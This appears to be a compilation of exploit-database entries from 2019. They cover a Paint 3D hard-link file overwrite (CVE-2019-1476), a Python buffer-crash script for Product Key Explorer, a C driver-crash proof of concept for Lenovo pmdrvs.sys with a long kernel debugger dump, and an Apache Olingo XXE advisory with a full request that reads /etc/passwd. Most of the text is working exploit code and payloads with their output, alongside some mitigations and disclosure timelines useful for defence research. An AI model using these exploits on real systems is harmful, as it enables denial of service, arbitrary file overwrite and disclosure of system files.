# Substituting the settings.dat.LOG1 or the settings.dat.LOG2 file with a hard
# link allows a low privileged user to overwrite an arbitrary file with registry
# data or just simply empty it, respectively. A low privileged user could exploit
# this vulnerability to cause denial of service by overwriting critical system
# files.
Steps to reproduce:
1. Terminate Paint 3D processes.
2. Delete settings.* files in Microsoft.MSPaint_8wekyb3d8bbwe\Settings folder.
3. Create a hard link from settings.dat.LOG1 to C:\Windows\win.ini.
4. Execute the start ms-paint: command to run Paint 3D.
5. Terminate Paint 3D processes.
Expected result:
It isn't possible to overwrite a file not writable by a low privileged user.
Observed result:
C:\Windows\win.ini file is overwritten with registry data.
References:
https://github.com/sgabe/CVE-2019-1476
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1476
https://krbtgt.pw/dacl-permissions-overwrite-privilege-escalation-cve-2019-0841
# Exploit Title: Product Key Explorer 4.2.0.0 - 'Key' Denial of Service (POC)
# Discovery by: SajjadBnd
# Date: 2019-12-10
# Vendor Homepage: http://www.nsauditor.com
# Software Link: http://www.nsauditor.com/downloads/productkeyexplorer_setup.exe
# Tested Version: 4.2.0.0
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: Windows 10 - Pro
# [ About App ]
# Find product keys for over +9000 most popular programs: Windows 8.1, Windows 8, Windows 7, Vista,
# Windows 10, Microsoft Office, Adobe CS6, CS5, CS4 and CS3, Norton, Electronic Arts games, WinZip, Nero and more...
# Visit "Features" page to see all supported software list of programs with which product key finder works.
# Product Key Finder | Best Product Key Finder Software
# The Best Product Key Find and Recovery Software
# Product key Explorer recovers product keys for software installed on your
# local and network computers, allows track the number of software licenses installed in your business.
# Product Key Finder | Best Product Key Finder Software
# The Best Product Key Find and Recovery Software
# With Product Key Explorer you can recover lost product keys for all major software programs, prevent losing your investment and money!
# Product Key Finder | Best Product Key Finder Software
# The Best Product Key Find and Recovery Software
# You can save product keys as Tab Delimited Txt File (.txt), Excel Workbook (.xls), CSV Comma Delimited (.csv),
# Access Database (.mdb), SQLLite3 Database, Web Page (.html) or XML Data (.xml) file, Print or Copy to Clipboard.
# [ POC ]
# 1.Run the python script, it will create a new file "dos.txt"
# 3.Run Product Key Explorer and click on "Register -> Enter Registration Code"
# 2.Paste the content of dos.txt into the Field: 'Key'
# 6.click 'ok'
# 5.Crashed ;)
#!/usr/bin/env python
buffer = "\x41" * 100
buffer += "\x42" * 100
buffer += "\x43" * 58
try:
f = open("dos.txt","w")
print "[+] Creating %s bytes DOS payload.." %len(buffer)
f.write(buffer)
f.close()
print "[+] File created!"
except:
print "File cannot be created"
# Exploit Title: Lenovo Power Management Driver 1.67.17.48 - 'pmdrvs.sys' Denial of Service (PoC)
# Date: 2019-12-11
# Exploit Author: Nassim Asrir
# CVE: CVE-2019-6192
# Tested On: Windows 10(64bit) | ThinkPad T470p
# Vendor : https://www.lenovo.com/us/en/
# Ref : https://support.lenovo.com/us/fr/solutions/len-29334
# Description
# A vulnerability in pmdrvs.sys driver has been discovered in Lenovo Power Management Driver
# The vulnerability exists due to insuffiecient input buffer validation when the driver processes IOCTL codes
# Attackers can exploit this issue to cause a Denial of Service or possibly execute arbitrary code in kernel space.
# Exploit
#include <windows.h>
#include <stdio.h>
#include <conio.h>
int main(int argc, char **argv)
{
HANDLE hDevice;
DWORD bret;
char szDevice[] = "\\\\.\\pmdrvs";
printf("--[ Lenovo Power Management Driver pmdrvs.sys Denial Of Service ]--\n");
printf("Opening handle to driver..\n");
if ((hDevice = CreateFileA(szDevice, GENERIC_READ | GENERIC_WRITE,0,0,OPEN_EXISTING,0,NULL)) != INVALID_HANDLE_VALUE) {
printf("Device %s succesfully opened!\n", szDevice);
printf("\tHandle: %p\n", hDevice);
}
else
{
printf("Error: Error opening device %s\n", szDevice);
}
printf("\nPress any key to DoS..");
_getch();
bret = 0;
if (!DeviceIoControl(hDevice, 0x80862013, (LPVOID)0xdeadbeef, 0x0, (LPVOID)0xdeadbeef, 0x0, &bret, NULL))
{
printf("DeviceIoControl Error - bytes returned %#x\n", bret);
}
CloseHandle(hDevice);
return 0;
}
# RCA
2: kd> !analyze -v
*******************************************************************************
* *
* Bugcheck Analysis *
* *
*******************************************************************************
SYSTEM_SERVICE_EXCEPTION (3b)
An exception happened while executing a system service routine.
Arguments:
Arg1: 00000000c0000005, Exception code that caused the bugcheck
Arg2: fffff80428bf109d, Address of the instruction which caused the bugcheck
Arg3: ffffc709dee8ec50, Address of the context record for the exception that caused the bugcheck
Arg4: 0000000000000000, zero.
FAULTING_IP:
pmdrvs+109d
fffff804`28bf109d 8b07 mov eax,dword ptr [rdi]
CONTEXT: ffffc709dee8ec50 -- (.cxr 0xffffc709dee8ec50)
rax=fffff80428bf5020 rbx=ffffca04ca8f80a0 rcx=ffffc709dee8f6d8
rdx=ffffca04ca8f8170 rsi=ffffca04ca8f8170 rdi=0000000000000000
rip=fffff80428bf109d rsp=ffffc709dee8f640 rbp=ffffca04cc188290
r8=000000000000000e r9=ffffca04c1ca8d40 r10=fffff80428bf5020
r11=ffffc709dee8f6b8 r12=0000000000000000 r13=ffffca04c1ca8d40
r14=0000000000000002 r15=0000000000000000
iopl=0 nv up ei pl zr na po nc
cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00010246
pmdrvs+0x109d:
fffff804`28bf109d 8b07 mov eax,dword ptr [rdi] ds:002b:00000000`00000000=????????
Resetting default scope
CPU_COUNT: 8
CPU_MHZ: af8
CPU_VENDOR: GenuineIntel
CPU_FAMILY: 6
CPU_MODEL: 9e
CPU_STEPPING: 9
CPU_MICROCODE: 0,0,0,0 (F,M,S,R) SIG: 8E'00000000 (cache) 0'00000000 (init)
BLACKBOXBSD: 1 (!blackboxbsd)
BLACKBOXPNP: 1 (!blackboxpnp)
CURRENT_IRQL: 0
ANALYSIS_SESSION_HOST: LAPTOP-SP
ANALYSIS_SESSION_TIME: 09-30-2019 20:29:54.0485
ANALYSIS_VERSION: 10.0.17763.132 amd64fre
LAST_CONTROL_TRANSFER: from fffff80428bf5060 to fffff80428bf109d
STACK_TEXT:
ffffc709`dee8f640 fffff804`28bf5060 : 00000000`00000000 ffff9980`05b00099 00000000`00000000 00000000`00000000 : pmdrvs+0x109d
ffffc709`dee8f6c0 fffff804`1f12dba9 : ffffca04`ca8f80a0 fffff804`1f6d6224 ffffca04`cc51ff20 00000000`00000000 : pmdrvs+0x5060
ffffc709`dee8f6f0 fffff804`1f6abb11 : ffffc709`dee8fa80 ffffca04`ca8f80a0 00000000`00000001 ffffca04`cc188290 : nt!IofCallDriver+0x59
ffffc709`dee8f730 fffff804`1f6d763c : ffffca04`00000000 ffffca04`cc188290 ffffc709`dee8fa80 ffffc709`dee8fa80 : nt!NtQueryInformationFile+0x1071
ffffc709`dee8f7e0 fffff804`1f64c356 : 00007fff`2fd66712 00000000`00000000 00000000`00000000 00000000`00000000 : nt!NtClose+0xffc
ffffc709`dee8f920 fffff804`1f27a305 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : nt!NtDeviceIoControlFile+0x56
ffffc709`dee8f990 00007fff`33aaf844 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : nt!setjmpex+0x7925
00000000`0068fcf8 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : 0x00007fff`33aaf844
THREAD_SHA1_HASH_MOD_FUNC: fea423dc9c9c08c703f6d9d5b0d8f7062b0ece68
THREAD_SHA1_HASH_MOD_FUNC_OFFSET: 4653d18777ce51b05029c753677fc2c05d5811bb
THREAD_SHA1_HASH_MOD: c2a3dbda00dbcf5ade5303449052a7349d5c580b
FOLLOWUP_IP:
pmdrvs+109d
fffff804`28bf109d 8b07 mov eax,dword ptr [rdi]
FAULT_INSTR_CODE: 8941078b
SYMBOL_STACK_INDEX: 0
FOLLOWUP_NAME: MachineOwner
STACK_COMMAND: .cxr 0xffffc709dee8ec50 ; kb
BUGCHECK_STR: 2E8B5A19
EXCEPTION_CODE_STR: 2E8B5A19
EXCEPTION_STR: WRONG_SYMBOLS
PROCESS_NAME: ntoskrnl.wrong.symbols.exe
IMAGE_NAME: ntoskrnl.wrong.symbols.exe
MODULE_NAME: nt_wrong_symbols
SYMBOL_NAME: nt_wrong_symbols!2E8B5A19A70000
BUCKET_ID: WRONG_SYMBOLS_X64_17763.1.amd64fre.rs5_release.180914-1434_TIMESTAMP_940930-002145
DEFAULT_BUCKET_ID: WRONG_SYMBOLS_X64_17763.1.amd64fre.rs5_release.180914-1434_TIMESTAMP_940930-002145
PRIMARY_PROBLEM_CLASS: WRONG_SYMBOLS
FAILURE_BUCKET_ID: WRONG_SYMBOLS_X64_17763.1.amd64fre.rs5_release.180914-1434_TIMESTAMP_940930-002145_2E8B5A19_nt_wrong_symbols!2E8B5A19A70000
TARGET_TIME: 2019-09-30T19:27:36.000Z
OSBUILD: 17763
OSSERVICEPACK: 0
SERVICEPACK_NUMBER: 0
OS_REVISION: 0
SUITE_MASK: 272
PRODUCT_TYPE: 1
OSPLATFORM_TYPE: x64
OSNAME: Windows 10
OSEDITION: Windows 10 WinNt TerminalServer SingleUserTS
OS_LOCALE:
USER_LCID: 0
OSBUILD_TIMESTAMP: 1994-09-30 01:21:45
BUILDDATESTAMP_STR: 180914-1434
BUILDLAB_STR: rs5_release
BUILDOSVER_STR: 10.0.17763.1.amd64fre.rs5_release.180914-1434
ANALYSIS_SESSION_ELAPSED_TIME: ae
ANALYSIS_SOURCE: KM
FAILURE_ID_HASH_STRING: km:wrong_symbols_x64_17763.1.amd64fre.rs5_release.180914-1434_timestamp_940930-002145_2e8b5a19_nt_wrong_symbols!2e8b5a19a70000
FAILURE_ID_HASH: {f0486cd4-fec7-73b9-14c0-31bcf2dd24e1}
Followup: MachineOwner
---------
2: kd> u fffff804`28bf109d
pmdrvs+0x109d:
fffff804`28bf109d 8b07 mov eax,dword ptr [rdi]
fffff804`28bf109f 41894308 mov dword ptr [r11+8],eax
fffff804`28bf10a3 e858ffffff call pmdrvs+0x1000 (fffff804`28bf1000)
fffff804`28bf10a8 85c0 test eax,eax
fffff804`28bf10aa 0f8582000000 jne pmdrvs+0x1132 (fffff804`28bf1132)
fffff804`28bf10b0 488b8c2498000000 mov rcx,qword ptr [rsp+98h]
fffff804`28bf10b8 4885c9 test rcx,rcx
fffff804`28bf10bb 7475 je pmdrvs+0x1132 (fffff804`28bf1132)
2: kd> !for_each_frame .frame /r @$Frame
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
00 ffffc709`dee8e318 fffff804`1f27a8e9 nt!KeBugCheckEx
00 ffffc709`dee8e318 fffff804`1f27a8e9 nt!KeBugCheckEx
rax=ffffc709dee8e420 rbx=ffffc709dee8fa00 rcx=000000000000003b
rdx=00000000c0000005 rsi=ffffc709dee8eaf0 rdi=0000000000000000
rip=fffff8041f269040 rsp=ffffc709dee8e318 rbp=ffffc709dee8ea10
r8=fffff80428bf109d r9=ffffc709dee8ec50 r10=0000000000000000
r11=000000001f0b5000 r12=fffff8041f27a305 r13=ffffc709dee8e510
r14=0000000000000000 r15=ffffc709dee8f408
iopl=0 nv up ei ng nz na pe nc
cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282
nt!KeBugCheckEx:
fffff804`1f269040 48894c2408 mov qword ptr [rsp+8],rcx ss:0018:ffffc709`dee8e320=000000000000003b
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
01 ffffc709`dee8e320 fffff804`1f279d3c nt!setjmpex+0x7f09
01 ffffc709`dee8e320 fffff804`1f279d3c nt!setjmpex+0x7f09
rax=ffffc709dee8e420 rbx=ffffc709dee8fa00 rcx=000000000000003b
rdx=00000000c0000005 rsi=ffffc709dee8eaf0 rdi=0000000000000000
rip=fffff8041f27a8e9 rsp=ffffc709dee8e320 rbp=ffffc709dee8ea10
r8=fffff80428bf109d r9=ffffc709dee8ec50 r10=0000000000000000
r11=000000001f0b5000 r12=fffff8041f27a305 r13=ffffc709dee8e510
r14=0000000000000000 r15=ffffc709dee8f408
iopl=0 nv up ei ng nz na pe nc
cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282
nt!setjmpex+0x7f09:
fffff804`1f27a8e9 90 nop
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
02 ffffc709`dee8e460 fffff804`1f271b4f nt!setjmpex+0x735c
02 ffffc709`dee8e460 fffff804`1f271b4f nt!setjmpex+0x735c
rax=ffffc709dee8e420 rbx=ffffc709dee8fa00 rcx=000000000000003b
rdx=00000000c0000005 rsi=ffffc709dee8eaf0 rdi=0000000000000000
rip=fffff8041f279d3c rsp=ffffc709dee8e460 rbp=ffffc709dee8ea10
r8=fffff80428bf109d r9=ffffc709dee8ec50 r10=0000000000000000
r11=000000001f0b5000 r12=fffff8041f27a305 r13=ffffc709dee8e510
r14=0000000000000000 r15=ffffc709dee8f408
iopl=0 nv up ei ng nz na pe nc
cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282
nt!setjmpex+0x735c:
fffff804`1f279d3c b801000000 mov eax,1
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
03 ffffc709`dee8e4a0 fffff804`1f1ca460 nt!_chkstk+0x41f
03 ffffc709`dee8e4a0 fffff804`1f1ca460 nt!_chkstk+0x41f
rax=ffffc709dee8e420 rbx=ffffc709dee8fa00 rcx=000000000000003b
rdx=00000000c0000005 rsi=ffffc709dee8eaf0 rdi=0000000000000000
rip=fffff8041f271b4f rsp=ffffc709dee8e4a0 rbp=ffffc709dee8ea10
r8=fffff80428bf109d r9=ffffc709dee8ec50 r10=0000000000000000
r11=000000001f0b5000 r12=fffff8041f27a305 r13=ffffc709dee8e510
r14=0000000000000000 r15=ffffc709dee8f408
iopl=0 nv up ei ng nz na pe nc
cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282
nt!_chkstk+0x41f:
fffff804`1f271b4f 0f1f00 nop dword ptr [rax]
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
04 ffffc709`dee8e4d0 fffff804`1f0d7c24 nt!RtlUnwindEx+0x3440
04 ffffc709`dee8e4d0 fffff804`1f0d7c24 nt!RtlUnwindEx+0x3440
rax=ffffc709dee8e420 rbx=ffffc709dee8fa00 rcx=000000000000003b
rdx=00000000c0000005 rsi=ffffc709dee8eaf0 rdi=0000000000000000
rip=fffff8041f1ca460 rsp=ffffc709dee8e4d0 rbp=ffffc709dee8ea10
r8=fffff80428bf109d r9=ffffc709dee8ec50 r10=0000000000000000
r11=000000001f0b5000 r12=fffff8041f27a305 r13=ffffc709dee8e510
r14=0000000000000000 r15=ffffc709dee8f408
iopl=0 nv up ei ng nz na pe nc
cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282
nt!RtlUnwindEx+0x3440:
fffff804`1f1ca460 8bd0 mov edx,eax
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
05 ffffc709`dee8ec20 fffff804`1f27a9c2 nt!ExReleaseAutoExpandPushLockExclusive+0x264
05 ffffc709`dee8ec20 fffff804`1f27a9c2 nt!ExReleaseAutoExpandPushLockExclusive+0x264
rax=ffffc709dee8e420 rbx=ffffc709dee8f408 rcx=000000000000003b
rdx=00000000c0000005 rsi=ffffc709dee8ec50 rdi=0000000000000000
rip=fffff8041f0d7c24 rsp=ffffc709dee8ec20 rbp=ffffc709dee8f150
r8=fffff80428bf109d r9=ffffc709dee8ec50 r10=0000000000000000
r11=000000001f0b5000 r12=000000000010001f r13=ffffca04c1ca8d40
r14=ffffc709dee8f4b0 r15=0000000000000000
iopl=0 nv up ei ng nz na pe nc
cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282
nt!ExReleaseAutoExpandPushLockExclusive+0x264:
fffff804`1f0d7c24 84c0 test al,al
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
06 ffffc709`dee8f2d0 fffff804`1f276cae nt!setjmpex+0x7fe2
06 ffffc709`dee8f2d0 fffff804`1f276cae nt!setjmpex+0x7fe2
rax=ffffc709dee8e420 rbx=ffffca04ca8f80a0 rcx=000000000000003b
rdx=00000000c0000005 rsi=ffffca04ca8f8170 rdi=0000000000000000
rip=fffff8041f27a9c2 rsp=ffffc709dee8f2d0 rbp=ffffc709dee8f530
r8=fffff80428bf109d r9=ffffc709dee8ec50 r10=0000000000000000
r11=000000001f0b5000 r12=0000000000000000 r13=ffffca04c1ca8d40
r14=0000000000000002 r15=0000000000000000
iopl=0 nv up ei ng nz na pe nc
cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282
nt!setjmpex+0x7fe2:
fffff804`1f27a9c2 488d8c2400010000 lea rcx,[rsp+100h]
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
07 ffffc709`dee8f4b0 fffff804`28bf109d nt!setjmpex+0x42ce
07 ffffc709`dee8f4b0 fffff804`28bf109d nt!setjmpex+0x42ce
rax=ffffc709dee8e420 rbx=ffffca04ca8f80a0 rcx=000000000000003b
rdx=00000000c0000005 rsi=ffffca04ca8f8170 rdi=0000000000000000
rip=fffff8041f276cae rsp=ffffc709dee8f4b0 rbp=ffffc709dee8f530
r8=fffff80428bf109d r9=ffffc709dee8ec50 r10=0000000000000000
r11=000000001f0b5000 r12=0000000000000000 r13=ffffca04c1ca8d40
r14=0000000000000002 r15=0000000000000000
iopl=0 nv up ei ng nz na pe nc
cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282
nt!setjmpex+0x42ce:
fffff804`1f276cae 440f20c0 mov rax,cr8
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
08 ffffc709`dee8f640 fffff804`28bf5060 pmdrvs+0x109d
08 ffffc709`dee8f640 fffff804`28bf5060 pmdrvs+0x109d
rax=fffff80428bf5020 rbx=ffffca04ca8f80a0 rcx=ffffc709dee8f6d8
rdx=ffffca04ca8f8170 rsi=ffffca04ca8f8170 rdi=0000000000000000
rip=fffff80428bf109d rsp=ffffc709dee8f640 rbp=ffffca04cc188290
r8=000000000000000e r9=ffffca04c1ca8d40 r10=fffff80428bf5020
r11=ffffc709dee8f6b8 r12=0000000000000000 r13=ffffca04c1ca8d40
r14=0000000000000002 r15=0000000000000000
iopl=0 nv up ei ng nz na pe nc
cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282
pmdrvs+0x109d:
fffff804`28bf109d 8b07 mov eax,dword ptr [rdi] ds:002b:00000000`00000000=????????
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
09 ffffc709`dee8f6c0 fffff804`1f12dba9 pmdrvs+0x5060
09 ffffc709`dee8f6c0 fffff804`1f12dba9 pmdrvs+0x5060
rax=fffff80428bf5020 rbx=ffffca04ca8f80a0 rcx=ffffc709dee8f6d8
rdx=ffffca04ca8f8170 rsi=0000000000000001 rdi=0000000000000000
rip=fffff80428bf5060 rsp=ffffc709dee8f6c0 rbp=ffffca04cc188290
r8=000000000000000e r9=ffffca04c1ca8d40 r10=fffff80428bf5020
r11=ffffc709dee8f6b8 r12=0000000000000000 r13=ffffca04c1ca8d40
r14=0000000000000002 r15=0000000000000000
iopl=0 nv up ei ng nz na pe nc
cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282
pmdrvs+0x5060:
fffff804`28bf5060 eb28 jmp pmdrvs+0x508a (fffff804`28bf508a)
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
0a ffffc709`dee8f6f0 fffff804`1f6abb11 nt!IofCallDriver+0x59
0a ffffc709`dee8f6f0 fffff804`1f6abb11 nt!IofCallDriver+0x59
rax=fffff80428bf5020 rbx=ffffca04ca8f80a0 rcx=ffffc709dee8f6d8
rdx=ffffca04ca8f8170 rsi=0000000000000001 rdi=ffffca04cc188290
rip=fffff8041f12dba9 rsp=ffffc709dee8f6f0 rbp=ffffca04cc188290
r8=000000000000000e r9=ffffca04c1ca8d40 r10=fffff80428bf5020
r11=ffffc709dee8f6b8 r12=0000000000000000 r13=ffffca04c1ca8d40
r14=0000000000000002 r15=0000000000000000
iopl=0 nv up ei ng nz na pe nc
cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282
nt!IofCallDriver+0x59:
fffff804`1f12dba9 4883c438 add rsp,38h
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
0b ffffc709`dee8f730 fffff804`1f6d763c nt!NtQueryInformationFile+0x1071
0b ffffc709`dee8f730 fffff804`1f6d763c nt!NtQueryInformationFile+0x1071
rax=fffff80428bf5020 rbx=ffffca04ca8f80a0 rcx=ffffc709dee8f6d8
rdx=ffffca04ca8f8170 rsi=0000000000000001 rdi=ffffca04cc188290
rip=fffff8041f6abb11 rsp=ffffc709dee8f730 rbp=ffffca04cc188290
r8=000000000000000e r9=ffffca04c1ca8d40 r10=fffff80428bf5020
r11=ffffc709dee8f6b8 r12=0000000000000000 r13=ffffca04c1ca8d40
r14=0000000000000002 r15=0000000000000000
iopl=0 nv up ei ng nz na pe nc
cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282
nt!NtQueryInformationFile+0x1071:
fffff804`1f6abb11 448bf0 mov r14d,eax
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
0c ffffc709`dee8f7e0 fffff804`1f64c356 nt!NtClose+0xffc
0c ffffc709`dee8f7e0 fffff804`1f64c356 nt!NtClose+0xffc
rax=fffff80428bf5020 rbx=ffffca04cc188290 rcx=ffffc709dee8f6d8
rdx=ffffca04ca8f8170 rsi=0000000000000000 rdi=ffffca04ca8f80a0
rip=fffff8041f6d763c rsp=ffffc709dee8f7e0 rbp=ffffc709dee8fa80
r8=000000000000000e r9=ffffca04c1ca8d40 r10=fffff80428bf5020
r11=ffffc709dee8f6b8 r12=ffffca04ca8f81b8 r13=fffff780000002dc
r14=0000000000000000 r15=0000000000000000
iopl=0 nv up ei ng nz na pe nc
cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282
nt!NtClose+0xffc:
fffff804`1f6d763c eb25 jmp nt!NtClose+0x1023 (fffff804`1f6d7663)
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
0d ffffc709`dee8f920 fffff804`1f27a305 nt!NtDeviceIoControlFile+0x56
0d ffffc709`dee8f920 fffff804`1f27a305 nt!NtDeviceIoControlFile+0x56
rax=fffff80428bf5020 rbx=ffffca04c88b3080 rcx=ffffc709dee8f6d8
rdx=ffffca04ca8f8170 rsi=000000000068fd18 rdi=ffffc709dee8f9a8
rip=fffff8041f64c356 rsp=ffffc709dee8f920 rbp=ffffc709dee8fa80
r8=000000000000000e r9=ffffca04c1ca8d40 r10=fffff80428bf5020
r11=ffffc709dee8f6b8 r12=0000000000000000 r13=0000000000000010
r14=0000000000000000 r15=0000000000000000
iopl=0 nv up ei ng nz na pe nc
cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282
nt!NtDeviceIoControlFile+0x56:
fffff804`1f64c356 4883c468 add rsp,68h
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
0e ffffc709`dee8f990 00007fff`33aaf844 nt!setjmpex+0x7925
0e ffffc709`dee8f990 00007fff`33aaf844 nt!setjmpex+0x7925
rax=fffff80428bf5020 rbx=ffffca04c88b3080 rcx=ffffc709dee8f6d8
rdx=ffffca04ca8f8170 rsi=000000000068fd18 rdi=ffffc709dee8f9a8
rip=fffff8041f27a305 rsp=ffffc709dee8f990 rbp=ffffc709dee8fa80
r8=000000000000000e r9=ffffca04c1ca8d40 r10=fffff80428bf5020
r11=ffffc709dee8f6b8 r12=0000000000000000 r13=0000000000000010
r14=0000000000000000 r15=0000000000000000
iopl=0 nv up ei ng nz na pe nc
cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282
nt!setjmpex+0x7925:
fffff804`1f27a305 0f1f00 nop dword ptr [rax]
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
0f 00000000`0068fcf8 00000000`00000000 0x00007fff`33aaf844
0f 00000000`0068fcf8 00000000`00000000 0x00007fff`33aaf844
rax=fffff80428bf5020 rbx=0000000000000000 rcx=ffffc709dee8f6d8
rdx=ffffca04ca8f8170 rsi=00000000deadbeef rdi=000000000000004c
rip=00007fff33aaf844 rsp=000000000068fcf8 rbp=000000000000004c
r8=000000000000000e r9=ffffca04c1ca8d40 r10=fffff80428bf5020
r11=ffffc709dee8f6b8 r12=0000000000000000 r13=0000000000000010
r14=0000000000000000 r15=0000000000000000
iopl=0 nv up ei ng nz na pe nc
cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282
00007fff`33aaf844 ?? ???
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
00 ffffc709`dee8e318 fffff804`1f27a8e9 nt!KeBugCheckEx
# Mitigation
Update to Lenovo Power Management driver version 1.67.17.48 or higher
#############################################################
#
# COMPASS SECURITY ADVISORY
# https://www.compass-security.com/research/advisories/
#
#############################################################
#
# Product: Apache Olingo OData 4.0
# Vendor: Apache Foundation
# CSNC ID: CSNC-2009-025
# CVE ID: CVE-2019-17554
# Subject: XML External Entity Resolution (XXE)
# Risk: High
# Effect: Remotely exploitable
# Author: Archibald Haddock (advisories@compass-security.com)
# Date: 08.11.2019
#
#############################################################
Introduction:
-------------
Apache Olingo is a Java library that implements the Open Data Protocol (OData). [1]
XML data is parsed by insecurley configured software components, which can be abused for XML External Entity Attacks [2].
Affected:
---------
Vulnerable:
* Olingo OData 4.x.x to 4.6.x
Not vulnerable:
* Olingo OData 4.7.0
* The Olingo OData 2.0 implementation has XXE protection since 1.1.0-RC01
Technical Description
---------------------
The XML content type entity deserializer is not configured to deny the resolution of external entities.
Request with content type "application/xml", which trigger the deserialization of entities, can be used to trigger XXE attacks.
Request
======
POST /odata-server-sample/cars.svc/Cars HTTP/1.1
Host: localhost:8081
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:70.0) Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://localhost:8081/odata-server-sample/
Cookie: JSESSIONID=17C3158153CDC2CA1DBA0E77D4AFC3B0
Upgrade-Insecure-Requests: 1
content-type: application/xml
Content-Length: 1101
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<a:entry xmlns:a="http://www.w3.org/2005/Atom" xmlns:m="http://docs.oasis-open.org/odata/ns/metadata" xmlns:d="http://docs.oasis-open.org/odata/ns/data" m:context="$metadata#Cars/$entity">
<a:id>Cars(1)</a:id>
<a:title></a:title>
<a:summary></a:summary>
<a:updated>2019-11-08T15:10:30Z</a:updated>
<a:author>
<a:name></a:name>
</a:author>
<a:link rel="edit" href="Cars(1)"></a:link>
<a:link rel="http://docs.oasis-open.org/odata/ns/related/Manufacturer" type="application/atom+xml;type=feed" title="Manufacturer" href="Cars(1)/Manufacturer"></a:link>
<a:category scheme="http://docs.oasis-open.org/odata/ns/scheme" term="#olingo.odata.sample.Car"></a:category>
<a:content type="application/xml">
<m:properties>
<d:Id m:type="Int16">1</d:Id>
<d:Model>F1 &xxe;</d:Model>
<d:ModelYear>2012</d:ModelYear>
<d:Price m:type="Decimal">189189.43</d:Price>
<d:Currency>EUR</d:Currency>
</m:properties>
</a:content>
</a:entry>
Response
========
HTTP/1.1 201 Created
Server: Apache-Coyote/1.1
OData-Version: 4.0
Content-Type: application/xml
Content-Length: 960
Date: Fri, 08 Nov 2019 14:22:35 GMT
Connection: close
<?xml version="1.0" encoding="UTF-8"?><a:entry xmlns:a="http://www.w3.org/2005/Atom" xmlns:m="http://docs.oasis-open.org/odata/ns/metadata" xmlns:d="http://docs.oasis-open.org/odata/ns/data" m:context="$metadata#Cars"><a:id>Cars(1)</a:id><a:title></a:title><a:summary></a:summary><a:updated>2019-11-08T15:22:35Z</a:updated><a:author><a:name></a:name></a:author><a:link rel="edit" href="Cars(1)"></a:link><a:link rel="http://docs.oasis-open.org/odata/ns/related/Manufacturer" type="application/atom+xml;type=feed" title="Manufacturer" href="Cars(1)/Manufacturer"></a:link><a:category scheme="http://docs.oasis-open.org/odata/ns/scheme" term="#olingo.odata.sample.Car"></a:category><a:content type="application/xml"><m:properties><d:Id m:type="Int16">1</d:Id><d:Model>
myuser:x:1000:1000:,,,:/home/myuser:/bin/bash
</d:Model><d:ModelYear>2012</d:ModelYear><d:Price m:type="Decimal">189189.43</d:Price><d:Currency>EUR</d:Currency></m:properties></a:content></a:entry>
Workaround / Fix:
-----------------
Configure the XML reader securely [3].
In org.apache.olingo.server.core.deserializer.xml.ODataXmlDeserializer.java on line 70 a javax.xml.stream.XMLInputFactory is instanciated:
private static final XMLInputFactory FACTORY = XMLInputFactory.newFactory();
The XMLInputFactory should be configured, not to resolve external entities:
FACTORY.setProperty(XMLInputFactory.SUPPORT_DTD, false);
FACTORY.setProperty("javax.xml.stream.isSupportingExternalEntities", false);
Timeline:
---------
2019-11-08: Discovery by Compass Security
2019-11-08: Initial vendor notification
2019-11-08: Initial vendor response
2019-12-04: Release of fixed Version / Patch [4]
2019-12-05: Coordinated public disclosure date
[1] https://olingo.apache.org/
[2] https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing
[3] https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html
[4] https://mail-archives.apache.org/mod_mbox/olingo-user/201912.mbox/%3CCAGSZ4d7Ty%3DL-n_iAzT6vcQp65BY29XZDS5tMoM8MdDrb1moM7A%40mail.gmail.com%3E
